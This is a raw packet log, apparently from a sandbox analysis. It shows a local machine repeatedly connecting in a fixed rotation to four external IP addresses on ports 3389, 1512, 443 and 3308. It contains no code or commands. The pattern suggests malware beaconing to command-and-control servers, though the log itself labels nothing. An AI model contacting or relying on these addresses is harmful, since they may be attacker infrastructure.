Jan 12, 2021 01:45:18.845683098 CET	49311	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:18.899853945 CET	3389	49311	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:18.900167942 CET	49311	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:18.939413071 CET	3389	49311	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:18.954138041 CET	3389	49311	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:18.954188108 CET	3389	49311	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:19.047569990 CET	3389	49311	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:19.047631025 CET	3389	49311	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:19.047918081 CET	49311	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:19.053544044 CET	49311	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:19.108052969 CET	3389	49311	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:19.166035891 CET	49312	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:19.219041109 CET	1512	49312	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:19.219176054 CET	49312	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:19.220700979 CET	49312	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:19.273550987 CET	1512	49312	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:19.280415058 CET	1512	49312	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:19.280457020 CET	1512	49312	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:19.280563116 CET	49312	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:19.280603886 CET	49312	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:19.294893980 CET	49312	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:19.349009037 CET	1512	49312	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:19.349280119 CET	49312	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:19.359364033 CET	49312	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:19.359469891 CET	49312	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:19.412333965 CET	1512	49312	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:19.412607908 CET	49312	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:19.450468063 CET	1512	49312	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:19.465652943 CET	1512	49312	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:19.465696096 CET	1512	49312	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:19.569014072 CET	1512	49312	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:19.569053888 CET	1512	49312	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:19.569994926 CET	49312	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:19.573048115 CET	49312	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:19.628618002 CET	1512	49312	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:19.678759098 CET	49313	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:19.731188059 CET	443	49313	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:19.731321096 CET	49313	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:19.732897997 CET	49313	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:19.785404921 CET	443	49313	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:19.800482035 CET	443	49313	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:19.800595999 CET	49313	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:19.815310001 CET	49313	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:19.870012045 CET	443	49313	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:19.870382071 CET	49313	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:19.875001907 CET	49313	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:19.875164986 CET	49313	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:19.927620888 CET	443	49313	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:19.927947044 CET	49313	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:19.980520964 CET	443	49313	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:20.098680019 CET	443	49313	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:20.098727942 CET	443	49313	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:20.099004984 CET	49313	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:20.104669094 CET	49313	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:20.156969070 CET	443	49313	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:20.225852013 CET	49314	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:20.269212961 CET	3308	49314	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:20.269458055 CET	49314	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:20.271200895 CET	49314	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:20.314327955 CET	3308	49314	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:20.328686953 CET	3308	49314	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:20.328723907 CET	3308	49314	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:20.328990936 CET	49314	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:20.346426010 CET	49314	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:20.391881943 CET	3308	49314	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:20.392115116 CET	49314	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:20.401608944 CET	49314	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:20.401933908 CET	49314	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:20.445067883 CET	3308	49314	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:20.445369005 CET	49314	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:20.485457897 CET	3308	49314	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:20.488678932 CET	3308	49314	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:20.601421118 CET	3308	49314	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:20.601479053 CET	3308	49314	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:20.601767063 CET	49314	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:20.607712984 CET	49314	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:20.651098967 CET	3308	49314	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:20.724216938 CET	49315	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:20.777996063 CET	3389	49315	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:20.778218031 CET	49315	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:20.779347897 CET	49315	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:20.832976103 CET	3389	49315	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:20.857657909 CET	3389	49315	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:20.857706070 CET	3389	49315	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:20.857852936 CET	49315	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:20.857903004 CET	49315	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:20.871014118 CET	49315	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:20.930676937 CET	3389	49315	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:20.931036949 CET	49315	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:20.941199064 CET	49315	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:20.941385031 CET	49315	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:20.994992971 CET	3389	49315	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:20.995244980 CET	49315	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:21.034243107 CET	3389	49315	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:21.052483082 CET	3389	49315	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:21.052525997 CET	3389	49315	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:21.143486977 CET	3389	49315	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:21.143534899 CET	3389	49315	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:21.143909931 CET	49315	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:21.151537895 CET	49315	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:21.205353022 CET	3389	49315	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:21.270390987 CET	49316	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:21.323669910 CET	1512	49316	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:21.323795080 CET	49316	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:21.325404882 CET	49316	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:21.378144026 CET	1512	49316	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:21.384963989 CET	1512	49316	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:21.385004997 CET	1512	49316	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:21.385066032 CET	49316	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:21.385121107 CET	49316	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:21.402910948 CET	49316	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:21.456923962 CET	1512	49316	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:21.457245111 CET	49316	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:21.466377020 CET	49316	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:21.466542959 CET	49316	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:21.519305944 CET	1512	49316	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:21.519697905 CET	49316	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:21.558489084 CET	1512	49316	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:21.572602034 CET	1512	49316	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:21.672523975 CET	1512	49316	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:21.672569036 CET	1512	49316	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:21.672914028 CET	49316	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:21.678528070 CET	49316	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:21.731296062 CET	1512	49316	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:21.799338102 CET	49317	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:21.851820946 CET	443	49317	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:21.851918936 CET	49317	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:21.853399992 CET	49317	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:21.905565977 CET	443	49317	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:21.920305967 CET	443	49317	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:21.920392990 CET	49317	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:21.927228928 CET	49317	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:21.981723070 CET	443	49317	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:21.981977940 CET	49317	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:21.991100073 CET	49317	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:21.991292953 CET	49317	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:22.043492079 CET	443	49317	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:22.043788910 CET	49317	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:22.083303928 CET	443	49317	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:22.096323967 CET	443	49317	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:22.214329958 CET	443	49317	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:22.214385986 CET	443	49317	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:22.214466095 CET	49317	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:22.214512110 CET	49317	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:22.220207930 CET	49317	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:22.272455931 CET	443	49317	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:22.331773043 CET	49318	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:22.375263929 CET	3308	49318	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:22.375483036 CET	49318	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:22.377181053 CET	49318	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:22.420339108 CET	3308	49318	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:22.439244032 CET	3308	49318	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:22.439311028 CET	3308	49318	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:22.439361095 CET	49318	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:22.439414024 CET	49318	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:22.454288006 CET	49318	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:22.500732899 CET	3308	49318	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:22.501017094 CET	49318	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:22.511138916 CET	49318	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:22.511502981 CET	49318	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:22.554615021 CET	3308	49318	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:22.554975986 CET	49318	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:22.595288992 CET	3308	49318	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:22.598206043 CET	3308	49318	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:22.598251104 CET	3308	49318	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:22.710944891 CET	3308	49318	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:22.710988045 CET	3308	49318	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:22.711218119 CET	49318	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:22.716950893 CET	49318	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:22.760191917 CET	3308	49318	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:22.830203056 CET	49319	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:22.884118080 CET	3389	49319	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:22.884242058 CET	49319	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:22.885390043 CET	49319	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:22.939057112 CET	3389	49319	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:22.971524000 CET	3389	49319	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:22.971573114 CET	3389	49319	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:22.971640110 CET	49319	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:22.971682072 CET	49319	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:22.983748913 CET	49319	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:23.055275917 CET	3389	49319	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:23.055679083 CET	49319	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:23.065927982 CET	49319	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:23.066107988 CET	49319	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:23.121459961 CET	3389	49319	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:23.121635914 CET	49319	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:23.159311056 CET	3389	49319	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:23.175571918 CET	3389	49319	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:23.175625086 CET	3389	49319	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:23.265700102 CET	3389	49319	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:23.265746117 CET	3389	49319	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:23.265918970 CET	49319	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:23.271754980 CET	49319	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:23.325632095 CET	3389	49319	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:23.399629116 CET	49320	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:23.452990055 CET	1512	49320	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:23.453145027 CET	49320	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:23.454772949 CET	49320	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:23.507793903 CET	1512	49320	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:23.515084982 CET	1512	49320	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:23.515130043 CET	1512	49320	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:23.515208960 CET	49320	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:23.515258074 CET	49320	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:23.532700062 CET	49320	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:23.586980104 CET	1512	49320	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:23.587308884 CET	49320	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:23.597352028 CET	49320	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:23.597656965 CET	49320	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:23.650619984 CET	1512	49320	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:23.650903940 CET	49320	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:23.690665960 CET	1512	49320	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:23.704046965 CET	1512	49320	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:23.704092026 CET	1512	49320	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:23.805478096 CET	1512	49320	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:23.805531979 CET	1512	49320	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:23.805839062 CET	49320	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:23.811295033 CET	49320	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:23.864327908 CET	1512	49320	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:23.921561956 CET	49321	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:23.973916054 CET	443	49321	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:23.974049091 CET	49321	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:23.975683928 CET	49321	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:24.027925968 CET	443	49321	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:24.042557955 CET	443	49321	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:24.042870998 CET	49321	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:24.060563087 CET	49321	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:24.115334034 CET	443	49321	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:24.115454912 CET	49321	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:24.123312950 CET	49321	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:24.123553038 CET	49321	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:24.175816059 CET	443	49321	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:24.175928116 CET	49321	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:24.228300095 CET	443	49321	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:24.346395016 CET	443	49321	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:24.346445084 CET	443	49321	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:24.346781015 CET	49321	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:24.353827000 CET	49321	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:24.406347036 CET	443	49321	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:24.466805935 CET	49322	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:24.510096073 CET	3308	49322	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:24.510299921 CET	49322	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:24.511919022 CET	49322	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:24.613878012 CET	3308	49322	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:24.628505945 CET	3308	49322	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:24.628544092 CET	3308	49322	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:24.628788948 CET	49322	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:24.644388914 CET	49322	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:24.689493895 CET	3308	49322	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:24.689848900 CET	49322	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:24.700865984 CET	49322	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:24.701169014 CET	49322	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:24.744446993 CET	3308	49322	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:24.744694948 CET	49322	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:24.783826113 CET	3308	49322	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:24.788041115 CET	3308	49322	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:24.788081884 CET	3308	49322	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:24.900281906 CET	3308	49322	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:24.900330067 CET	3308	49322	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:24.900645018 CET	49322	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:24.906198978 CET	49322	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:24.949723959 CET	3308	49322	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:25.025393963 CET	49323	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:25.081722975 CET	3389	49323	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:25.081872940 CET	49323	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:25.083394051 CET	49323	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:25.137681007 CET	3389	49323	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:25.172507048 CET	3389	49323	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:25.172558069 CET	3389	49323	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:25.172655106 CET	49323	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:25.172696114 CET	49323	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:25.186467886 CET	49323	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:25.248270035 CET	3389	49323	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:25.248606920 CET	49323	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:25.258292913 CET	49323	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:25.258371115 CET	49323	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:25.312690973 CET	3389	49323	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:25.312860966 CET	49323	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:25.352355957 CET	3389	49323	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:25.369999886 CET	3389	49323	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:25.370057106 CET	3389	49323	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:25.463381052 CET	3389	49323	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:25.463437080 CET	3389	49323	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:25.463741064 CET	49323	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:25.467989922 CET	49323	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:25.522533894 CET	3389	49323	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:25.606530905 CET	49324	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:25.659509897 CET	1512	49324	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:25.659626961 CET	49324	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:25.660923958 CET	49324	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:25.713855028 CET	1512	49324	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:25.720644951 CET	1512	49324	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:25.720688105 CET	1512	49324	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:25.720731974 CET	49324	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:25.720767975 CET	49324	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:25.729224920 CET	49324	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:25.783210993 CET	1512	49324	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:25.783395052 CET	49324	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:25.792747974 CET	49324	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:25.792982101 CET	49324	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:25.845751047 CET	1512	49324	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:25.845930099 CET	49324	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:25.882349014 CET	1512	49324	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:25.898833990 CET	1512	49324	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:25.996212959 CET	1512	49324	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:25.996269941 CET	1512	49324	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:25.996408939 CET	49324	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:25.996438026 CET	49324	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:26.026190996 CET	49324	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:26.079336882 CET	1512	49324	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:26.233056068 CET	49325	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:26.285273075 CET	443	49325	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:26.285454035 CET	49325	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:26.286801100 CET	49325	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:26.338880062 CET	443	49325	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:26.353760958 CET	443	49325	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:26.353863955 CET	49325	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:26.367301941 CET	49325	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:26.421664000 CET	443	49325	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:26.421782970 CET	49325	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:26.426266909 CET	49325	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:26.426430941 CET	49325	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:26.478382111 CET	443	49325	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:26.478476048 CET	49325	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:26.530523062 CET	443	49325	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:26.647986889 CET	443	49325	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:26.648061991 CET	443	49325	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:26.648363113 CET	49325	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:26.648411036 CET	49325	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:26.650759935 CET	49325	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:26.702805996 CET	443	49325	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:27.013773918 CET	49326	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:27.057084084 CET	3308	49326	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:27.057209015 CET	49326	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:27.057812929 CET	49326	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:27.100951910 CET	3308	49326	80.86.91.27	192.168.2.22
